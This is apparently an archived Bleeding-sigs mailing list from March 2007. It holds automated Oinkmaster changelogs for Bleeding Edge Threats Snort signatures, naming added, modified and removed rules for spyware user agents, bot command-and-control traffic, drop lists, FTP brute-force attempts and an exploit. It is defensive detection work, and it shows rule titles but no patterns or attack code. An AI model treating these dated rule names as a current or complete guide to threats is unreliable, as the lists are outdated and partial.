(bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [---] Removed rules: [---] 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 116 -> Added to bleeding-drop.rules (1): # VERSION 116 -> Added to bleeding-malware.rules (2): #by shirkdog from spyware lp data #by Shirkdog, from spyware lp hits -> Added to bleeding-policy.rules (1): #by Matt Jonkman, from qru -> Added to bleeding-sid-msg.map (4): 2003463 || BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware 2003467 || BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update || url,www3.ca.com/securityadvisor/pest/pest.aspx?id=453094187 2003468 || BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) 2003469 || BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 115 -> Removed from bleeding-drop.rules (1): # VERSION 115 -> Removed from bleeding-sid-msg.map (13): 2003463 || BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others 2404001 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) || url,www.shadowserver.org 2404002 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) || url,www.shadowserver.org 2404003 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) || url,www.shadowserver.org 2404004 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) || url,www.shadowserver.org 2404005 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) || url,www.shadowserver.org 2404006 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) || url,www.shadowserver.org 2405001 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE || url,www.shadowserver.org 2405002 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE || url,www.shadowserver.org 2405003 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE || url,www.shadowserver.org 2405004 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE || url,www.shadowserver.org 2405005 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE || url,www.shadowserver.org 2405006 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE || url,www.shadowserver.org From jonkman at bleedingthreats.net Thu Mar 8 21:19:01 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 8 21:18:15 2007 Subject: [Bleeding-sigs] Reference fixes Message-ID: <45F07DC5.9020504@bleedingthreats.net> I removed the reference from a number of the user-agent sigs in MALWARE. The link was bad. No rule updates, just that. Matt -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Fri Mar 9 15:00:05 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Fri Mar 9 15:00:16 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Weekly Signature Changes Message-ID: <20070309150005.2A08722C08B@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Fri Mar 9 10:00:05 2007 [***] [+++] Added rules: [+++] 2003462 - BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity (bleeding-malware.rules) 2003463 - BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware (bleeding-malware.rules) 2003464 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) (bleeding-attack_response.rules) 2003465 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) (bleeding-attack_response.rules) 2003466 - BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner (bleeding-web.rules) 2003467 - BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update (bleeding-malware.rules) 2003468 - BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) (bleeding-malware.rules) 2003469 - BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) (bleeding-policy.rules) [///] Modified active rules: [///] 2001852 - BLEEDING-EDGE MALWARE 404Search Spyware User Agent (bleeding-malware.rules) 2001853 - BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent (bleeding-malware.rules) 2001854 - BLEEDING-EDGE MALWARE EZULA Spyware User Agent (bleeding-malware.rules) 2001855 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) (bleeding-malware.rules) 2001858 - BLEEDING-EDGE MALWARE Hotbar Spyware User Agent (bleeding-malware.rules) 2001859 - BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent (bleeding-malware.rules) 2001860 - BLEEDING-EDGE MALWARE Kontiki Spyware User Agent (bleeding-malware.rules) 2001861 - BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent (bleeding-malware.rules) 2001862 - BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent (bleeding-malware.rules) 2001863 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) (bleeding-malware.rules) 2001864 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) (bleeding-malware.rules) 2001865 - BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent (bleeding-malware.rules) 2001867 - BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent (bleeding-malware.rules) 2001868 - BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent (bleeding-malware.rules) 2001869 - BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent (bleeding-malware.rules) 2001870 - BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent (bleeding-malware.rules) 2001871 - BLEEDING-EDGE MALWARE Target Saver Spyware User Agent (bleeding-malware.rules) 2001872 - BLEEDING-EDGE MALWARE Visicom Spyware User Agent (bleeding-malware.rules) 2002082 - BLEEDING-EDGE POLICY Unusual User Agent (Client) (bleeding-policy.rules) 2002383 - BLEEDING-EDGE SCAN Potential FTP Brute-Force attempt (bleeding-scan.rules) 2002402 - BLEEDING-EDGE MALWARE Web Search User Agent 3 (bleeding-malware.rules) 2003212 - BLEEDING-EDGE EXPLOIT Microsoft Office Data Structure Corruption (unpatched) (bleeding-exploit.rules) 2003308 - BLEEDING-EDGE P2P Edonkey IP Request (bleeding-p2p.rules) 2003309 - BLEEDING-EDGE P2P Edonkey IP Reply (bleeding-p2p.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [---] Removed rules: [---] 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 117 -> Added to bleeding-drop.rules (1): # VERSION 117 -> Added to bleeding-malware.rules (2): #by shirkdog from spyware lp data #by Shirkdog, from spyware lp hits -> Added to bleeding-policy.rules (2): #by Matt Jonkman, from qru #Moved from Malware, this is likely not spyware related -> Added to bleeding-scan.rules (1): #by atomic-penguin, tweak by matt Jonkman to cover other ftp daemons like freeftpd and warftpd -> Added to bleeding-sid-msg.map (27): 2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent 2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent 2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent 2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) 2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent 2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent 2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent 2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent 2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent 2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) 2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) 2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent 2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent 2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent 2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent 2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent 2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent 2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent 2002082 || BLEEDING-EDGE POLICY Unusual User Agent (Client) || url,doc.bleedingthreats.net/2002082 2003462 || BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity || url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html || url,cooldeskalert.com 2003463 || BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware 2003464 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) || url,www.warftp.org 2003465 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) || url,www.freeftp.com 2003466 || BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner || url,www.webmasterworld.com/search_engine_spiders/3227720.htm 2003467 || BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update || url,www3.ca.com/securityadvisor/pest/pest.aspx?id=453094187 2003468 || BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) 2003469 || BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) -> Added to bleeding-web.rules (1): #by shirkdog [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 109 -> Removed from bleeding-drop.rules (1): # VERSION 109 -> Removed from bleeding-policy.rules (1): #Moved from Malware, this is not spyware related -> Removed from bleeding-scan.rules (1): #by atomic-penguin -> Removed from bleeding-sid-msg.map (21): 2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents3 2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2002082 || BLEEDING-EDGE POLICY Infotriever Spyware User Agent || url,www.infotriever.com/Intro_SysAdmins.asp 2404006 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) || url,www.shadowserver.org 2405006 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE || url,www.shadowserver.org From bleeding at bleedingthreats.net Fri Mar 9 18:00:08 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Fri Mar 9 18:00:18 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070309180008.746C722C0AB@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Fri Mar 9 13:00:08 2007 [***] [+++] Added rules: [+++] 2003470 - BLEEDING-EDGE MALWARE Winsoftware.com Spyware User-Agent (Updater) (bleeding-malware.rules) 2003471 - BLEEDING-EDGE Malware Winsoftware.com Spyware Activity (bleeding-malware.rules) 2003472 - BLEEDING-EDGE Malware DelFin Project Spyware (setup-alt) (bleeding-malware.rules) 2003473 - BLEEDING-EDGE Malware DelFin Project Spyware (payload-alt) (bleeding-malware.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [///] Modified active rules: [///] 2001852 - BLEEDING-EDGE MALWARE 404Search Spyware User Agent (bleeding-malware.rules) 2001853 - BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent (bleeding-malware.rules) 2001854 - BLEEDING-EDGE MALWARE EZULA Spyware User Agent (bleeding-malware.rules) 2001855 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) (bleeding-malware.rules) 2001858 - BLEEDING-EDGE MALWARE Hotbar Spyware User Agent (bleeding-malware.rules) 2001859 - BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent (bleeding-malware.rules) 2001860 - BLEEDING-EDGE MALWARE Kontiki Spyware User Agent (bleeding-malware.rules) 2001861 - BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent (bleeding-malware.rules) 2001862 - BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent (bleeding-malware.rules) 2001863 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) (bleeding-malware.rules) 2001864 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) (bleeding-malware.rules) 2001865 - BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent (bleeding-malware.rules) 2001867 - BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent (bleeding-malware.rules) 2001868 - BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent (bleeding-malware.rules) 2001869 - BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent (bleeding-malware.rules) 2001870 - BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent (bleeding-malware.rules) 2001871 - BLEEDING-EDGE MALWARE Target Saver Spyware User Agent (bleeding-malware.rules) 2001872 - BLEEDING-EDGE MALWARE Visicom Spyware User Agent (bleeding-malware.rules) 2002402 - BLEEDING-EDGE MALWARE Web Search User Agent 3 (bleeding-malware.rules) 2002816 - BLEEDING-EDGE Malware DelFin Project Spyware (payload) (bleeding-malware.rules) 2002817 - BLEEDING-EDGE Malware DelFin Project Spyware (setup) (bleeding-malware.rules) 2003212 - BLEEDING-EDGE EXPLOIT Microsoft Office Data Structure Corruption (unpatched) (bleeding-exploit.rules) 2003467 - BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update (bleeding-malware.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 117 -> Added to bleeding-drop.rules (1): # VERSION 117 -> Added to bleeding-malware.rules (1): #Matt Jonkman, from spywarelp data -> Added to bleeding-sid-msg.map (32): 2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent 2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent 2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent 2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) 2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent 2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent 2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent 2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent 2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent 2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) 2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) 2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent 2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent 2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent 2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent 2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent 2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent 2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent 2003470 || BLEEDING-EDGE MALWARE Winsoftware.com Spyware User-Agent (Updater) 2003471 || BLEEDING-EDGE Malware Winsoftware.com Spyware Activity 2003472 || BLEEDING-EDGE Malware DelFin Project Spyware (setup-alt) 2003473 || BLEEDING-EDGE Malware DelFin Project Spyware (payload-alt) 2404001 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) || url,www.shadowserver.org 2404002 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) || url,www.shadowserver.org 2404003 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) || url,www.shadowserver.org 2404004 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) || url,www.shadowserver.org 2404005 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) || url,www.shadowserver.org 2405001 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE || url,www.shadowserver.org 2405002 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE || url,www.shadowserver.org 2405003 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE || url,www.shadowserver.org 2405004 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE || url,www.shadowserver.org 2405005 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE || url,www.shadowserver.org [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 116 -> Removed from bleeding-drop.rules (1): # VERSION 116 -> Removed from bleeding-sid-msg.map (18): 2001852 || BLEEDING-EDGE MALWARE 404Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001853 || BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001854 || BLEEDING-EDGE MALWARE EZULA Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001855 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001858 || BLEEDING-EDGE MALWARE Hotbar Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001859 || BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001860 || BLEEDING-EDGE MALWARE Kontiki Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001861 || BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001862 || BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001863 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001864 || BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) || 